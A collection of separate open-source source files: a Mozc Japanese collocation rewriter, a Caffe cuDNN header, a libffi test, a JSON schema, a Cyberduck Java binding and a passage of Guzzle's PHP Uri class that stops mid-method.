// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#include "rewriter/collocation_rewriter.h"
#include <algorithm>
#include <memory>
#include <string>
#include <vector>
#include "base/flags.h"
#include "base/hash.h"
#include "base/logging.h"
#include "base/util.h"
#include "converter/segments.h"
#include "data_manager/data_manager_interface.h"
#include "dictionary/pos_matcher.h"
#include "request/conversion_request.h"
#include "rewriter/collocation_util.h"
#include "storage/existence_filter.h"
#include "absl/strings/str_cat.h"
#include "absl/strings/string_view.h"
DEFINE_bool(use_collocation, true, "use collocation rewrite");
namespace mozc {
using mozc::storage::ExistenceFilter;
namespace {
const size_t kCandidateSize = 12;
const int kMaxCostDiff = 3453; // -500*log(1/1000)
// For collocation, we use two segments.
enum SegmentLookupType {
LEFT,
RIGHT,
};
// returns true if the given string contains number including Kanji.
bool ContainsNumber(const std::string &str) {
for (ConstChar32Iterator iter(str); !iter.Done(); iter.Next()) {
if (CollocationUtil::IsNumber(iter.Get())) {
return true;
}
}
return false;
}
// Returns true if value matches the pattern XXXPPPYYY, where XXX is a Kanji
// sequence, PPP is the given pattern, and YYY is a sequence containing at least
// one Kanji character. In the value matches the pattern, XXX and YYY are
// substituted to |first_content| and |second|, respectively. Returns false if
// the value isn't of the form XXXPPPYYY.
bool ParseCompound(const absl::string_view value,
const absl::string_view pattern,
absl::string_view *first_content,
absl::string_view *second) {
DCHECK(!value.empty());
DCHECK(!pattern.empty());
// Find the |first_content| candidate and check if it consists of Kanji only.
absl::string_view::const_iterator pattern_begin =
std::find(value.begin(), value.end(), pattern[0]);
if (pattern_begin == value.end()) {
return false;
}
*first_content = absl::string_view(
value.data(), std::distance(value.begin(), pattern_begin));
if (!Util::IsScriptType(*first_content, Util::KANJI)) {
return false;
}
// Check if the middle part matches |pattern|.
const absl::string_view remaining_value =
absl::ClippedSubstr(value, first_content->size());
if (!Util::StartsWith(remaining_value, pattern)) {
return false;
}
// Check if the last substring is eligible for |second|.
*second = absl::ClippedSubstr(remaining_value, pattern.size());
if (second->empty() || !Util::ContainsScriptType(*second, Util::KANJI)) {
return false;
}
// Just verify that |value| = |first_content| + |pattern| + |second|.
DCHECK_EQ(value, std::string(*first_content) + std::string(pattern) +
std::string(*second));
return true;
}
// A helper function to push back a string view to a vector.
inline void PushBackStringView(const absl::string_view s,
std::vector<std::string> *v) {
v->emplace_back(s.data(), s.size());
}
// Handles compound such as "本を読む"(one segment)
// we want to rewrite using it as if it was "<本|を><読む>"
// so that we can use collocation data like "厚い本"
void ResolveCompoundSegment(const std::string &top_value,
const std::string &value, SegmentLookupType type,
std::vector<std::string> *output) {
// see "http://ja.wikipedia.org/wiki/助詞"
static const char kPat1[] = "が";
// "の" was not good...
// static const char kPat2[] = "の";
static const char kPat3[] = "を";
static const char kPat4[] = "に";
static const char kPat5[] = "へ";
static const char kPat6[] = "と";
static const char kPat7[] = "から";
static const char kPat8[] = "より";
static const char kPat9[] = "で";
static const struct {
const char *pat;
size_t len;
} kParticles[] = {{kPat1, arraysize(kPat1) - 1},
// {kPat2, arraysize(kPat2) - 1},
{kPat3, arraysize(kPat3) - 1},
{kPat4, arraysize(kPat4) - 1},
{kPat5, arraysize(kPat5) - 1},
{kPat6, arraysize(kPat6) - 1},
{kPat7, arraysize(kPat7) - 1},
{kPat8, arraysize(kPat8) - 1},
{kPat9, arraysize(kPat9) - 1},
{NULL, 0}};
for (size_t i = 0; kParticles[i].pat != NULL; ++i) {
const absl::string_view particle(kParticles[i].pat, kParticles[i].len);
absl::string_view first_content, second;
if (!ParseCompound(top_value, particle, &first_content, &second)) {
continue;
}
if (ParseCompound(value, particle, &first_content, &second)) {
if (type == LEFT) {
output->emplace_back(second.data(), second.size());
output->push_back(absl::StrCat(first_content, particle));
} else {
output->emplace_back(first_content.data(), first_content.size());
}
return;
}
}
}
bool IsNaturalContent(const Segment::Candidate &cand,
const Segment::Candidate &top_cand,
SegmentLookupType type,
std::vector<std::string> *output) {
const std::string &content = cand.content_value;
const std::string &value = cand.value;
const std::string &top_content = top_cand.content_value;
const std::string &top_value = top_cand.value;
const size_t top_content_len = Util::CharsLen(top_content);
const size_t content_len = Util::CharsLen(content);
if (type == RIGHT && value != top_value && top_content_len >= 2 &&
content_len == 1) {
return false;
}
if (type == LEFT) {
output->push_back(value);
} else {
output->push_back(content);
// "舞って" workaround
// V+"て" is often treated as one compound.
static const char kPat[] = "て";
if (Util::EndsWith(content, absl::string_view(kPat, arraysize(kPat) - 1))) {
PushBackStringView(Util::Utf8SubString(content, 0, content_len - 1),
output);
}
}
// we don't rewrite NUMBER to others and vice versa
if (ContainsNumber(value) != ContainsNumber(top_value)) {
return false;
}
const absl::string_view top_aux_value =
Util::Utf8SubString(top_value, top_content_len, std::string::npos);
const size_t top_aux_value_len = Util::CharsLen(top_aux_value);
const Util::ScriptType top_value_script_type = Util::GetScriptType(top_value);
// we don't rewrite KATAKANA segment
// for example, we don't rewrite "コーヒー飲みます" to "珈琲飲みます"
if (type == LEFT && top_aux_value_len == 0 && top_value != value &&
top_value_script_type == Util::KATAKANA) {
return false;
}
// special cases
if (top_content_len == 1) {
const char *begin = top_content.data();
const char *end = top_content.data() + top_content.size();
size_t mblen = 0;
const char32 wchar = Util::UTF8ToUCS4(begin, end, &mblen);
switch (wchar) {
case 0x304a: // "お"
case 0x5fa1: // "御"
case 0x3054: // "ご"
return true;
default:
break;
}
}
const absl::string_view aux_value =
Util::Utf8SubString(value, content_len, std::string::npos);
// Remove number in normalization for the left segment.
std::string aux_normalized, top_aux_normalized;
CollocationUtil::GetNormalizedScript(aux_value, (type == LEFT),
&aux_normalized);
CollocationUtil::GetNormalizedScript(top_aux_value, (type == LEFT),
&top_aux_normalized);
if (!aux_normalized.empty() &&
!Util::IsScriptType(aux_normalized, Util::HIRAGANA)) {
if (type == RIGHT) {
return false;
}
if (aux_normalized != top_aux_normalized) {
return false;
}
}
ResolveCompoundSegment(top_value, value, type, output);
const size_t aux_value_len = Util::CharsLen(aux_value);
const size_t value_len = Util::CharsLen(value);
// "<XXいる|>" can be rewrited to "<YY|いる>" and vice versa
{
static const char kPat[] = "いる"; // "いる"
const absl::string_view kSuffix(kPat, arraysize(kPat) - 1);
if (top_aux_value_len == 0 && aux_value_len == 2 &&
Util::EndsWith(top_value, kSuffix) &&
Util::EndsWith(aux_value, kSuffix)) {
if (type == RIGHT) {
// "YYいる" in addition to "YY"
output->push_back(value);
}
return true;
}
if (aux_value_len == 0 && top_aux_value_len == 2 &&
Util::EndsWith(value, kSuffix) &&
Util::EndsWith(top_aux_value, kSuffix)) {
if (type == RIGHT) {
// "YY" in addition to "YYいる"
PushBackStringView(Util::Utf8SubString(value, 0, value_len - 2),
output);
}
return true;
}
}
// "<XXせる|>" can be rewrited to "<YY|せる>" and vice versa
{
const char kPat[] = "せる";
const absl::string_view kSuffix(kPat, arraysize(kPat) - 1);
if (top_aux_value_len == 0 && aux_value_len == 2 &&
Util::EndsWith(top_value, kSuffix) &&
Util::EndsWith(aux_value, kSuffix)) {
if (type == RIGHT) {
// "YYせる" in addition to "YY"
output->push_back(value);
}
return true;
}
if (aux_value_len == 0 && top_aux_value_len == 2 &&
Util::EndsWith(value, kSuffix) &&
Util::EndsWith(top_aux_value, kSuffix)) {
if (type == RIGHT) {
// "YY" in addition to "YYせる"
PushBackStringView(Util::Utf8SubString(value, 0, value_len - 2),
output);
}
return true;
}
}
const Util::ScriptType content_script_type = Util::GetScriptType(content);
// "<XX|する>" can be rewrited using "<XXす|る>" and "<XX|する>"
// in "<XX|する>", XX must be single script type
{
static const char kPat[] = "する";
const absl::string_view kSuffix(kPat, arraysize(kPat) - 1);
if (aux_value_len == 2 && Util::EndsWith(aux_value, kSuffix)) {
if (content_script_type != Util::KATAKANA &&
content_script_type != Util::HIRAGANA &&
content_script_type != Util::KANJI &&
content_script_type != Util::ALPHABET) {
return false;
}
if (type == RIGHT) {
// "YYす" in addition to "YY"
PushBackStringView(Util::Utf8SubString(value, 0, value_len - 1),
output);
}
return true;
}
}
// "<XXる>" can be rewrited using "<XX|る>"
// "まとめる", "衰える"
{
static const char kPat[] = "る";
const absl::string_view kSuffix(kPat, arraysize(kPat) - 1);
if (aux_value_len == 0 && Util::EndsWith(value, kSuffix)) {
if (type == RIGHT) {
// "YY" in addition to "YYる"
PushBackStringView(Util::Utf8SubString(value, 0, value_len - 1),
output);
}
return true;
}
}
// "<XXす>" can be rewrited using "XXする"
{
static const char kPat[] = "す";
const absl::string_view kSuffix(kPat, arraysize(kPat) - 1);
if (Util::EndsWith(value, kSuffix) &&
Util::IsScriptType(Util::Utf8SubString(value, 0, value_len - 1),
Util::KANJI)) {
if (type == RIGHT) {
const char kRu[] = "る";
// "YYする" in addition to "YY"
output->push_back(
absl::StrCat(value, absl::string_view(kRu, arraysize(kRu) - 1)));
}
return true;
}
}
// "<XXし|た>" can be rewrited using "<XX|した>"
{
static const char kPat[] = "した";
const absl::string_view kShi(kPat, 3), kTa(kPat + 3, 3);
if (Util::EndsWith(content, kShi) && aux_value == kTa &&
Util::EndsWith(top_content, kShi) && top_aux_value == kTa) {
if (type == RIGHT) {
const absl::string_view val =
Util::Utf8SubString(content, 0, content_len - 1);
// XX must be KANJI
if (Util::IsScriptType(val, Util::KANJI)) {
PushBackStringView(val, output);
}
}
return true;
}
}
const int aux_len = value_len - content_len;
const int top_aux_len = Util::CharsLen(top_value) - top_content_len;
if (aux_len != top_aux_len) {
return false;
}
const Util::ScriptType top_content_script_type =
Util::GetScriptType(top_content);
// we don't rewrite HIRAGANA to KATAKANA
if (top_content_script_type == Util::HIRAGANA &&
content_script_type == Util::KATAKANA) {
return false;
}
// we don't rewrite second KATAKANA
// for example, we don't rewrite "このコーヒー" to "この珈琲"
if (type == RIGHT && top_content_script_type == Util::KATAKANA &&
value != top_value) {
return false;
}
if (top_content_len == 1 && top_content_script_type == Util::HIRAGANA) {
return false;
}
// suppress "<身|ています>" etc.
if (top_content_len == 1 && content_len == 1 && top_aux_value_len >= 2 &&
aux_value_len >= 2 && top_content_script_type == Util::KANJI &&
content_script_type == Util::KANJI && top_content != content) {
return false;
}
return true;
}
// Just a wrapper of IsNaturalContent for debug.
bool VerifyNaturalContent(const Segment::Candidate &cand,
const Segment::Candidate &top_cand,
SegmentLookupType type) {
std::vector<std::string> nexts;
return IsNaturalContent(cand, top_cand, RIGHT, &nexts);
}
inline bool IsKeyUnknown(const Segment &seg) {
return Util::IsScriptType(seg.key(), Util::UNKNOWN_SCRIPT);
}
} // namespace
bool CollocationRewriter::RewriteCollocation(Segments *segments) const {
// return false if at least one segment is fixed.
for (size_t i = segments->history_segments_size();
i < segments->segments_size(); ++i) {
if (segments->segment(i).segment_type() == Segment::FIXED_VALUE) {
return false;
}
}
std::vector<bool> segs_changed(segments->segments_size(), false);
bool changed = false;
for (size_t i = segments->history_segments_size();
i < segments->segments_size(); ++i) {
bool rewrited_next = false;
if (IsKeyUnknown(segments->segment(i))) {
continue;
}
if (i + 1 < segments->segments_size() &&
RewriteUsingNextSegment(segments->mutable_segment(i + 1),
segments->mutable_segment(i))) {
changed = true;
rewrited_next = true;
segs_changed[i] = true;
segs_changed[i + 1] = true;
}
if (!segs_changed[i] && !rewrited_next && i > 0 &&
RewriteFromPrevSegment(segments->segment(i - 1).candidate(0),
segments->mutable_segment(i))) {
changed = true;
segs_changed[i - 1] = true;
segs_changed[i] = true;
}
const Segment::Candidate &cand = segments->segment(i).candidate(0);
if (i >= 2 &&
// Cross over only adverbs
// Segment is adverb if;
// 1) lid and rid is adverb.
// 2) or rid is adverb suffix.
((pos_matcher_.IsAdverb(segments->segment(i - 1).candidate(0).lid) &&
pos_matcher_.IsAdverb(segments->segment(i - 1).candidate(0).rid)) ||
pos_matcher_.IsAdverbSegmentSuffix(
segments->segment(i - 1).candidate(0).rid)) &&
(cand.content_value != cand.value ||
cand.value != "・")) { // "・" workaround
if (!segs_changed[i - 2] && !segs_changed[i] &&
RewriteUsingNextSegment(segments->mutable_segment(i),
segments->mutable_segment(i - 2))) {
changed = true;
segs_changed[i] = true;
segs_changed[i - 2] = true;
} else if (!segs_changed[i] &&
RewriteFromPrevSegment(segments->segment(i - 2).candidate(0),
segments->mutable_segment(i))) {
changed = true;
segs_changed[i] = true;
segs_changed[i - 2] = true;
}
}
}
return changed;
}
class CollocationRewriter::CollocationFilter {
public:
CollocationFilter(const char *existence_data, size_t size)
: filter_(ExistenceFilter::Read(existence_data, size)) {}
~CollocationFilter() {}
bool Exists(const std::string &left, const std::string &right) const {
if (left.empty() || right.empty()) {
return false;
}
std::string key;
key.reserve(left.size() + right.size());
key.assign(left).append(right);
const uint64 id = Hash::Fingerprint(key);
return filter_->Exists(id);
}
private:
std::unique_ptr<ExistenceFilter> filter_;
DISALLOW_COPY_AND_ASSIGN(CollocationFilter);
};
class CollocationRewriter::SuppressionFilter {
public:
SuppressionFilter(const char *suppression_data, size_t size)
: filter_(ExistenceFilter::Read(suppression_data, size)) {}
~SuppressionFilter() {}
bool Exists(const Segment::Candidate &cand) const {
// TODO(noriyukit): We should share key generation rule with
// gen_collocation_suppression_data_main.cc.
std::string key;
key.reserve(cand.content_value.size() + 1 + cand.content_key.size());
key.assign(cand.content_value).append("\t").append(cand.content_key);
const uint64 id = Hash::Fingerprint(key);
return filter_->Exists(id);
}
private:
std::unique_ptr<ExistenceFilter> filter_;
DISALLOW_COPY_AND_ASSIGN(SuppressionFilter);
};
CollocationRewriter::CollocationRewriter(
const DataManagerInterface *data_manager)
: pos_matcher_(data_manager->GetPOSMatcherData()),
first_name_id_(pos_matcher_.GetFirstNameId()),
last_name_id_(pos_matcher_.GetLastNameId()) {
const char *data = NULL;
size_t size = 0;
data_manager->GetCollocationData(&data, &size);
collocation_filter_.reset(new CollocationFilter(data, size));
data_manager->GetCollocationSuppressionData(&data, &size);
suppression_filter_.reset(new SuppressionFilter(data, size));
}
CollocationRewriter::~CollocationRewriter() {}
bool CollocationRewriter::Rewrite(const ConversionRequest &request,
Segments *segments) const {
if (!FLAGS_use_collocation) {
return false;
}
return RewriteCollocation(segments);
}
bool CollocationRewriter::IsName(const Segment::Candidate &cand) const {
const bool ret = (cand.lid == last_name_id_ || cand.lid == first_name_id_);
VLOG_IF(3, ret) << cand.value << " is name sagment";
return ret;
}
bool CollocationRewriter::RewriteFromPrevSegment(
const Segment::Candidate &prev_cand, Segment *seg) const {
std::string prev;
CollocationUtil::GetNormalizedScript(prev_cand.value, true, &prev);
const size_t i_max = std::min(seg->candidates_size(), kCandidateSize);
// Reuse |curs| and |cur| in the loop as this method is performance critical.
std::vector<std::string> curs;
std::string cur;
for (size_t i = 0; i < i_max; ++i) {
if (seg->candidate(i).cost > seg->candidate(0).cost + kMaxCostDiff) {
continue;
}
if (IsName(seg->candidate(i))) {
continue;
}
if (suppression_filter_->Exists(seg->candidate(i))) {
continue;
}
curs.clear();
if (!IsNaturalContent(seg->candidate(i), seg->candidate(0), RIGHT, &curs)) {
continue;
}
for (int j = 0; j < curs.size(); ++j) {
cur.clear();
CollocationUtil::GetNormalizedScript(curs[j], false, &cur);
if (collocation_filter_->Exists(prev, cur)) {
VLOG_IF(3, i != 0) << prev << cur << " " << seg->candidate(0).value
<< "->" << seg->candidate(i).value;
seg->move_candidate(i, 0);
seg->mutable_candidate(0)->attributes |=
Segment::Candidate::CONTEXT_SENSITIVE;
return true;
}
}
}
return false;
}
bool CollocationRewriter::RewriteUsingNextSegment(Segment *next_seg,
Segment *seg) const {
const size_t i_max = std::min(seg->candidates_size(), kCandidateSize);
const size_t j_max = std::min(next_seg->candidates_size(), kCandidateSize);
// Cache the results for the next segment
std::vector<int> next_seg_ok(j_max); // Avoiding std::vector<bool>
std::vector<std::vector<std::string> > normalized_string(j_max);
// Reuse |nexts| in the loop as this method is performance critical.
std::vector<std::string> nexts;
for (size_t j = 0; j < j_max; ++j) {
next_seg_ok[j] = 0;
if (IsName(next_seg->candidate(j))) {
continue;
}
if (suppression_filter_->Exists(next_seg->candidate(j))) {
continue;
}
nexts.clear();
if (!IsNaturalContent(next_seg->candidate(j), next_seg->candidate(0), RIGHT,
&nexts)) {
continue;
}
next_seg_ok[j] = 1;
for (std::vector<std::string>::const_iterator it = nexts.begin();
it != nexts.end(); ++it) {
normalized_string[j].push_back(std::string());
CollocationUtil::GetNormalizedScript(*it, false,
&normalized_string[j].back());
}
}
// Reuse |curs| and |cur| in the loop as this method is performance critical.
std::vector<std::string> curs;
std::string cur;
for (size_t i = 0; i < i_max; ++i) {
if (seg->candidate(i).cost > seg->candidate(0).cost + kMaxCostDiff) {
continue;
}
if (IsName(seg->candidate(i))) {
continue;
}
if (suppression_filter_->Exists(seg->candidate(i))) {
continue;
}
curs.clear();
if (!IsNaturalContent(seg->candidate(i), seg->candidate(0), LEFT, &curs)) {
continue;
}
for (int k = 0; k < curs.size(); ++k) {
cur.clear();
CollocationUtil::GetNormalizedScript(curs[k], true, &cur);
for (size_t j = 0; j < j_max; ++j) {
if (next_seg->candidate(j).cost >
next_seg->candidate(0).cost + kMaxCostDiff) {
continue;
}
if (!next_seg_ok[j]) {
continue;
}
for (int l = 0; l < normalized_string[j].size(); ++l) {
const std::string &next = normalized_string[j][l];
if (collocation_filter_->Exists(cur, next)) {
DCHECK(VerifyNaturalContent(next_seg->candidate(j),
next_seg->candidate(0), RIGHT))
<< "IsNaturalContent() should not fail here.";
seg->move_candidate(i, 0);
seg->mutable_candidate(0)->attributes |=
Segment::Candidate::CONTEXT_SENSITIVE;
next_seg->move_candidate(j, 0);
next_seg->mutable_candidate(0)->attributes |=
Segment::Candidate::CONTEXT_SENSITIVE;
return true;
}
}
}
}
}
return false;
}
} // namespace mozc
| {
"pile_set_name": "Github"
} |
#ifndef CAFFE_CUDNN_SIGMOID_LAYER_HPP_
#define CAFFE_CUDNN_SIGMOID_LAYER_HPP_
#include "./cudnn.hpp"
#include "../sigmoid_layer.hpp"
namespace caffe {
#ifdef USE_CUDNN
/**
* @brief CuDNN acceleration of SigmoidLayer.
*/
class CuDNNSigmoidLayer : public SigmoidLayer {
public:
explicit CuDNNSigmoidLayer(const LayerParameter& param)
: SigmoidLayer(param), handles_setup_(false) {}
virtual void LayerSetUp(const vector<Blob*>& bottom,
const vector<Blob*>& top);
virtual void Reshape(const vector<Blob*>& bottom,
const vector<Blob*>& top);
virtual ~CuDNNSigmoidLayer();
protected:
virtual void Forward_gpu(const vector<Blob*>& bottom,
const vector<Blob*>& top);
bool handles_setup_;
cudnnHandle_t handle_;
cudnnTensorDescriptor_t bottom_desc_;
cudnnTensorDescriptor_t top_desc_;
cudnnActivationDescriptor_t activ_desc_;
};
#endif // USE_CUDNN
} // namespace caffe
#endif // CAFFE_CUDNN_SIGMOID_LAYER_HPP_
| {
"pile_set_name": "Github"
} |
/* Area: ffi_call
Purpose: Check return value double.
Limitations: none.
PR: none.
Originator: <[email protected]> 20050212 */
/* { dg-do run } */
#include "ffitest.h"
static double return_dbl(double dbl)
{
printf ("%f\n", dbl);
return 2 * dbl;
}
int main (void)
{
ffi_cif cif;
ffi_type *args[MAX_ARGS];
void *values[MAX_ARGS];
double dbl, rdbl;
args[0] = &ffi_type_double;
values[0] = &dbl;
/* Initialize the cif */
CHECK(ffi_prep_cif(&cif, FFI_DEFAULT_ABI, 1,
&ffi_type_double, args) == FFI_OK);
for (dbl = -127.3; dbl < 127; dbl++)
{
ffi_call(&cif, FFI_FN(return_dbl), &rdbl, values);
printf ("%f vs %f\n", rdbl, return_dbl(dbl));
CHECK(rdbl == 2 * dbl);
}
exit(0);
}
| {
"pile_set_name": "Github"
} |
{
"id": "query.json#",
"type": "object",
"required": [
"name",
"value"
],
"properties": {
"name": {
"type": "string"
},
"value": {
"type": "string"
},
"comment": {
"type": "string"
}
}
}
| {
"pile_set_name": "Github"
} |
package ch.cyberduck.core.threading;
/*
* Copyright (c) 2002-2016 iterate GmbH. All rights reserved.
* https://cyberduck.io/
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
import ch.cyberduck.binding.foundation.NSObject;
import org.rococoa.ObjCClass;
import org.rococoa.Rococoa;
public abstract class NSOperation extends NSObject {
public static final _Class CLASS = Rococoa.createClass(NSOperation.class.getSimpleName(), _Class.class);
public interface _Class extends ObjCClass {
NSOperation alloc();
}
public abstract NSOperation init();
public abstract void start();
public abstract void main();
public abstract void cancel();
public abstract void waitUntilFinished();
public abstract boolean isCancelled();
public abstract boolean isExecuting();
public abstract boolean isFinished();
public abstract boolean isConcurrent();
public abstract boolean isReady();
}
| {
"pile_set_name": "Github"
} |
Please try again later
| {
"pile_set_name": "Github"
} |
<?php
namespace GuzzleHttp\Psr7;
use Psr\Http\Message\UriInterface;
/**
* PSR-7 URI implementation.
*
* @author Michael Dowling
* @author Tobias Schultze
* @author Matthew Weier O'Phinney
*/
class Uri implements UriInterface
{
private static $schemes = [
'http' => 80,
'https' => 443,
];
private static $charUnreserved = 'a-zA-Z0-9_\-\.~';
private static $charSubDelims = '!\$&\'\(\)\*\+,;=';
private static $replaceQuery = ['=' => '%3D', '&' => '%26'];
/** @var string Uri scheme. */
private $scheme = '';
/** @var string Uri user info. */
private $userInfo = '';
/** @var string Uri host. */
private $host = '';
/** @var int|null Uri port. */
private $port;
/** @var string Uri path. */
private $path = '';
/** @var string Uri query string. */
private $query = '';
/** @var string Uri fragment. */
private $fragment = '';
/**
* @param string $uri URI to parse
*/
public function __construct($uri = '')
{
if ($uri != '') {
$parts = parse_url($uri);
if ($parts === false) {
throw new \InvalidArgumentException("Unable to parse URI: $uri");
}
$this->applyParts($parts);
}
}
public function __toString()
{
return self::createUriString(
$this->scheme,
$this->getAuthority(),
$this->path,
$this->query,
$this->fragment
);
}
/**
* Removes dot segments from a path and returns the new path.
*
* @param string $path
*
* @return string
* @link http://tools.ietf.org/html/rfc3986#section-5.2.4
*/
public static function removeDotSegments($path)
{
static $noopPaths = ['' => true, '/' => true, '*' => true];
static $ignoreSegments = ['.' => true, '..' => true];
if (isset($noopPaths[$path])) {
return $path;
}
$results = [];
$segments = explode('/', $path);
foreach ($segments as $segment) {
if ($segment === '..') {
array_pop($results);
} elseif (!isset($ignoreSegments[$segment])) {
$results[] = $segment;
}
}
$newPath = implode('/', $results);
// Add the leading slash if necessary
if (substr($path, 0, 1) === '/' &&
substr($newPath, 0, 1) !== '/'
) {
$newPath = '/' . $newPath;
}
// Add the trailing slash if necessary
if ($newPath !== '/' && isset($ignoreSegments[end($segments)])) {
$newPath .= '/';
}
return $newPath;
}
/**
* Resolve a base URI with a relative URI and return a new URI.
*
* @param UriInterface $base Base URI
* @param string|UriInterface $rel Relative URI
*
* @return UriInterface
* @link http://tools.ietf.org/html/rfc3986#section-5.2
*/
public static function resolve(UriInterface $base, $rel)
{
if (!($rel instanceof UriInterface)) {
$rel = new self($rel);
}
if ((string) $rel === '') {
// we can simply return the same base URI instance for this same-document reference
return $base;
}
if ($rel->getScheme() != '') {
return $rel->withPath(self::removeDotSegments($rel->getPath()));
}
if ($rel->getAuthority() != '') {
$targetAuthority = $rel->getAuthority();
$targetPath = self::removeDotSegments($rel->getPath());
$targetQuery = $rel->getQuery();
} else {
$targetAuthority = $base->getAuthority();
if ($rel->getPath() === '') {
$targetPath = $base->getPath();
$targetQuery = $rel->getQuery() != '' ? $rel->getQuery() : $base->getQuery();
} else {
if ($rel->getPath()[0] === '/') {
$targetPath = $rel->getPath();
} else {
if ($targetAuthority != '' && $base->getPath() === '') {
$targetPath = '/' . $rel->getPath();
} else {
$lastSlashPos = strrpos($base->getPath(), '/');
if ($lastSlashPos === false) {
$targetPath = $rel->getPath();
} else {
$targetPath = substr($base->getPath(), 0, $lastSlashPos + 1) . $rel->getPath();
}
}
}
$targetPath = self::removeDotSegments($targetPath);
$targetQuery = $rel->getQuery();
}
}
return new self(self::createUriString(
$base->getScheme(),
$targetAuthority,
$targetPath,
$targetQuery,
$rel->getFragment()
));
}
/**
* Create a new URI with a specific query string value removed.
*
* Any existing query string values that exactly match the provided key are
* removed.
*
* @param UriInterface $uri URI to use as a base.
* @param string $key Query string key to remove.
*
* @return UriInterface
*/
public static function withoutQueryValue(UriInterface $uri, $key)
{
$current = $uri->getQuery();
if ($current == '') {
return $uri;
}
$decodedKey = rawurldecode($key);
$result = array_filter(explode('&', $current), function ($part) use ($decodedKey) {
return rawurldecode(explode('=', $part)[0]) !== $decodedKey;
});
return $uri->withQuery(implode('&', $result));
}
/**
* Create a new URI with a specific query string value.
*
* Any existing query string values that exactly match the provided key are
* removed and replaced with the given key value pair.
*
* A value of null will set the query string key without a value, e.g. "key"
* instead of "key=value".
*
* @param UriInterface $uri URI to use as a base.
* @param string $key Key to set.
* @param string|null $value Value to set
*
* @return UriInterface
*/
public static function withQueryValue(UriInterface $uri, $key, $value)
{
$current = $uri->getQuery();
if ($current == '') {
$result = [];
} else {
$decodedKey = rawurldecode($key);
$result = array_filter(explode('&', $current), function ($part) use ($decodedKey) {
return rawurldecode(explode('=', $part)[0]) !== $decodedKey;
});
}
// Query string separators ("=", "&") within the key or value need to be encoded
// (while preventing double-encoding) before setting the query string. All other
// chars that need percent-encoding will be encoded by withQuery().
$key = strtr($key, self::$replaceQuery);
if ($value !== null) {
$result[] = $key . '=' . strtr($value, self::$replaceQuery);
} else {
$result[] = $key;
}
return $uri->withQuery(implode('&', $result));
}
/**
* Create a URI from a hash of parse_url parts.
*
* @param array $parts
*
* @return self
*/
public static function fromParts(array $parts)
{
$uri = new self();
$uri->applyParts($parts);
return $uri;
}
public function getScheme()
{
return $this->scheme;
}
public function getAuthority()
{
if ($this->host == '') {
return '';
}
$authority = $this->host;
if ($this->userInfo != '') {
$authority = $this->userInfo . '@' . $authority;
}
if ($this->port !== null) {
$authority .= ':' . $this->port;
}
return $authority;
}
public function getUserInfo()
{
return $this->userInfo;
}
public function getHost()
{
return $this->host;
}
public function getPort()
{
return $this->port;
}
public function getPath()
{
return $this->path;
}
public function getQuery()
{
return $this->query;
}
public function getFragment()
{
return $this->fragment;
}
public function withScheme($scheme)
{
$scheme = $this->filterScheme($scheme);
if ($this->scheme === $scheme) {
return $this;
}
$new = clone $this;
$new->scheme = $scheme;
$new->port = $new->filterPort($new->port);
return $new;
}
public function withUserInfo($user, $password = null)
{
$info = $user;
if ($password != '') {
$info .= ':' . $password;
}
if ($this->userInfo === $info) {
return $this;
}
$new = clone $this;
$new->userInfo = $info;
return $new;
}
public function withHost($host)
{
$host = $this->filterHost($host);
if ($this->host === $host) {
return $this;
}
$new = clone $this;
$new->host = $host;
return $new;
}
public function withPort($port)
{
$port = $this->filterPort($port);
if ($this->port === $port) {
return $this;
}
$new = clone $this;
$new->port = $port;
return $new;
}
public function withPath($path)
{
$path = $this->filterPath($path);
if ($this->path === $path) {
return $this;
}
$new = clone $this;
$new->path = $path;
return $new;
}
public function withQuery($query)
{
$query = $this->filterQueryAndFragment($query);
if ($this->query === $query) {
return $this;
}
$new = clone $this;
$new->query = $query;
return $new;
}
public function withFragment($fragment)
{
$fragment = $this->filterQueryAndFragment($fragment);
if ($this->fragment === $fragment) {
return $this;
}
$new = clone $this;
$new->fragment = $fragment;
return $new;
}
/**
* Apply parse_url parts to a URI.
*
* @param array $parts Array of parse_url parts to apply.
*/
private function applyParts(array $parts)
{
$this->scheme = isset($parts['scheme'])
? $this->filterScheme($parts['scheme'])
: '';
$this->userInfo = isset($parts['user']) ? $parts['user'] : '';
$this->host = isset($parts['host'])
? $this->filterHost($parts['host'])
: '';
$this->port = isset($parts['port'])
? $this->filterPort($parts['port'])
: null;
$this->path = isset($parts['path'])
? $this->filterPath($parts['path'])
: '';
$this->query = isset($parts['query'])
? $this->filterQueryAndFragment($parts['query'])
: '';
$this->fragment = isset($parts['fragment'])
? $this->filterQueryAndFragment($parts['fragment'])
: '';
if (isset($parts['pass'])) {
$this->userInfo .= ':' . $parts['pass'];
}
}
/**
* Create a URI string from its various parts
*
* @param string $scheme
* @param string $authority
* @param string $path
* @param string $query
* @param string $fragment
* @return string
*/
private static function createUriString($scheme, $authority, $path, $query, $fragment)
{
$uri = '';
if ($scheme != '') {
$uri .= $scheme . ':';
}
if ($authority != '') {
$uri .= '//' . $authority;
}
if ($path != '') {
if ($path[0] !== '/') {
if ($authority != '') {
// If the path is rootless and an authority is present, the path MUST be prefixed by "/"
$path = '/' . $path;
}
} elseif (isset($path[1]) && $path[1] === '/') {
if ($authority == '') {
// If the path is starting with more than one "/" and no authority is present, the
// starting slashes MUST be reduced to one.
$path = '/' . ltrim($path, '/');
}
}
$uri .= $path;
}
if ($query != '') {
$uri .= '?' . $query;
}
